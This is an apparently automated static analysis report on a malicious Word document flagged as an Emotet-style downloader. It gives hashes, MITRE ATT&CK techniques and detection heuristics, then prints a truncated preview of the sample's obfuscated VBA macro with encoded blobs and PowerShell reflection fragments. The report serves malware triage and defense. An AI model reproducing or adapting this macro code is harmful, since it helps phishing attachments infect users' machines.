Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0560ef2be5dffddc…

MALICIOUS

Office (OLE)

Size: 163.0 KB
Created: 2018-03-21 20:43:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 74bf14cbe2e492a4c5c8ab9e345ce258
SHA-1: a83d1058289ac7d82e31f91f44a5395c281e66e8
SHA-256: 0560ef2be5dffddcae1d93e66a9011a2e2c3b85c565a2c86cb627d36eceebfcf
Risk Score: 224

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Microsoft Word document containing VBA macros, specifically an AutoOpen macro. Heuristics indicate the use of CreateObject, suggesting the execution of code to download and run a secondary payload. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature. The VBA script itself appears heavily obfuscated, making it difficult to determine the exact download URL or execution method, but its intent is clearly to fetch and run additional malware.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45942 bytes
SHA-256: bd0bde099eff6ac10043c2a3043de22a5fca4b6a913ad6951ff7d09344a89c6d
Detection
  • ClamAV: No threats found
  • Obfuscation or payload: likely
    Carved artifact contains 17 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DQbMPFECqBoz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "shETlKIlk"
Function ktRwtKA()
On Error Resume Next
Select Case jIBwSY
         Case 5936
            wEsOlC = Hex(1562 - CSng(4035) - 67630 + ChrW(hSqOS))
            BPEra = RntaHD
End Select
FLjpGWZN = tzUDv("8oEAYgBhAGMANwBjAGEAYgmuUwz", 3, 20)
Select Case GHQHSC
         Case 14044
            dWEzhc = Hex(76964 - CSng(25950) - 18571 + ChrW(VppvCU))
            HFmEV = vzTcG
End Select
Select Case japvbi
         Case 92715
            KGXoz = Hex(37176 - CSng(77502) - 68745 + ChrW(ckwuni))
            bdcjX = Czshz
End Select
nzXpljOJ = tzUDv("YKoWmOkAGIAYgBkAGYANgBhADUAZAA0ADcAZAAyADYAMwA3ADQAYwA4ADYAYwAwAGYANwAwADcANQAwADgAOAA4ADYAMQA3ADgAOABlAGQAMgA3ADAAYQAxADEAYwBjAGYANQA1AGEAYgA3ADkAZQA4ADUAZgBlADMAYQAyADIAYgo,", 7, 167)
Select Case bFskRG
         Case 61894
            ttrXqj = Hex(30089 - CSng(587) - 2377 + ChrW(hwriUw))
            MkwDX = SUoIak
End Select
Select Case kkakZw
         Case 30687
            lVIBZ = Hex(66557 - CSng(39232) - 49244 + ChrW(LfCCv))
            cqPbQL = NtpLi
End Select
ESHGbfu = tzUDv("wceS.mArSHAL].gEtmEMberS()[4].NaME).InvOKe( [RuNTIme.iNterOpservuJJXdmf9", 2, 63)
Select Case snCuUD
         Case 31173
            JHMOw = Hex(63357 - CSng(93210) - 15317 + ChrW(wcoFwu))
            UzviI = LOAbh
End Select
Select Case jpOhm
         Case 34570
            rHKhdR = Hex(13218 - CSng(61655) - 24628 + ChrW(jvAmMA))
            ZAIil = wRobXz
End Select
kjsbEqLw = tzUDv("zj5KF16050a5345MgB8AEsASQBUAGYAeQBwAHYAQwA3ADYAWgBWAEoATgBaAG0AegBjAGUAVAB1AFEAPQA9AHwAMAAxAGQAOQAxAGIAYwAzAGMAk2", 6, 106)
Select Case Cdtaz
         Case 81108
            qJnsRS = Hex(11104 - CSng(44333) - 99802 + ChrW(SXpGIl))
            FGUNP = qjjnfF
End Select
Select Case cCTqjF
         Case 66674
            coPaOJ = Hex(79000 - CSng(7669) - 59673 + ChrW(kAkAvI))
            IwjfiZ = jnsit
End Select
HlHoLXsKT = tzUDv("v5BkADMAOQAwADEAOQA5AaskOz", 3, 19)
Select Case YpRFMI
         Case 93
            RiREpG = Hex(88621 - CSng(97997) - 97610 + ChrW(HKEYGC))
            wOMrb = GKCau
End Select
Select Case zbXEz
         Case 71786
            DLiTHF = Hex(77982 - CSng(93086) - 78333 + ChrW(bhiff))
            vGIsmR = ZtEHNs
End Select
ArRisTYwZHM = tzUDv("Xu4ADgAZABlADQA5EIWZ4", 3, 13)
Select Case Vtjhz
         Case 90778
            OuhVX = Hex(62205 - CSng(18143) - 58473 + ChrW(rnRrbz))
            svmiFZ = zaEhv
End Select
Select Case YQPVkm
         Case 73243
            EKwJJ = Hex(4323 - CSng(12538) - 31922 + ChrW(zqQvZ))
            InCQZs = PKKnRN
End Select
DwCQScU = tzUDv("r3A2ADkAYwBjAGMAYQBlADkANQAwADcAMQBmADIANAA5ADIjGZJ", 3, 45)
Select Case iQktk
         Case 21480
            biiSk = Hex(23497 - CSng(61181) - 78593 + ChrW(jwwiG))
            iVMdTv = wVktBh
End Select
Select Case sJJdz
         Case 2243
            iPcQS = Hex(20455 - CSng(33352) - 45119 + ChrW(MMhIIF))
            bHDzI = iwKIiw
End Select
Lqszw = tzUDv("wwBlAGMAMgA5ADIAOQAzADYAMAAwADcANAA3ADUAZAA1ADcAMQBkADUAMgBkADcAZQA3AGYAOQAzADQAYQAyADQANgBjADIANQBhADAAMwAyADIAMwBmAGMAMgA5ADYANwAyAGUAMwA1AQ@WiAJG", 3, 139)
Select Case ttFqIY
         Case 4057
            FoHXr = Hex(40104 - CSng(42983) - 7508 + ChrW(PLnjh))
            tBDIj = GJjTrq
End Select
Select Case zdrZQA
         Case 41802
            PTMAK = Hex(2863 - CSng(29939) - 24642 + ChrW(EzIBJV))
            CUnPb = TcLkA
End Select
IpdovZbWv = tzUDv("Ih6gAxADAANAA5ADIAZgAwAGYAZQA2ADAANAA1AGYAZgAyADIAYgA3ADQANQA5AGUAYgA1AGUANAA1AGEAOAA2AGUAZAA0AGIAOQA4ADUAYQA1ADMAYgBhADUANwAyAGQAOABjADcANwA0ADAANwBmADQAMABmADYANQBUN4", 4, 162)
Select Case WifiYi
         Case 73865
            HhBWXI = Hex(53860 - CSng(26716) - 52567 + ChrW(znHkXw))
            GlNzk = ZBcqMY
E
... (truncated)